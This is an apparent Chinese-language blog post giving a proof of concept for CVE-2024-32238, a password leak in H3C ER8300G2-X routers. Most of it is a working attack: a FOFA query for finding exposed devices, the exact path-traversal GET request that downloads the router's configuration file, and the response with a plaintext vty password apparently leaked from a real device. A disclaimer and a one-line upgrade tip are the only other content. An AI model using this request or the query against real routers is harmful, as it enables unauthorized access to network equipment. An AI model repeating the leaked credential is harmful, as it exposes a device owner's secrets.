CVE-2024-32238 漏洞复现 poc

免责声明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞名称

H3C ER8300G2-X-密码泄露漏洞

影响版本

版本不详

漏洞描述

H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。

fofa语句

app="H3C-Ent-Router" && title=="ER8300G2-X系统管理"

漏洞复现

发送以下数据包

GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

响应包

HTTP/1.0 200 OK
Date: Thu Oct  3 18:45:50 2024
Server: H3C-Miniware-Webs
Last-modified: Thu Oct  3 18:45:50 2024
Content-length: 157121
Content-type: application/x-unknown;charset=GB2312

881250c4e970962729fb6758a04381dd  
ER8300G2-X/ERHMG2V100D022
$sys
@base
#
	if-type=root
	ifname=root
	name=H3C
	passwd=
#
	auxidletimeout=300
	auxauthmode=password
#1
	vtyname=ttyp0
	vtypasswd=lpx598662
	vtyidletimeout=300
	vtypasswdtype=simple
	vtyauthmode=password
#2
	vtyname=ttyp1
	vtypasswd=lpx598662
	vtyidletimeout=300
	vtypasswdtype=simple
	vtyauthmode=password
@lanctrl
#
	lanctrl-start-ip=0.0.0.0
	lanctrl-end-ip=255.255.255.255
@telnet
#

其中vtypasswd=lpx598662是密码

登录

漏洞复现成功

修复建议

升级到最新版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值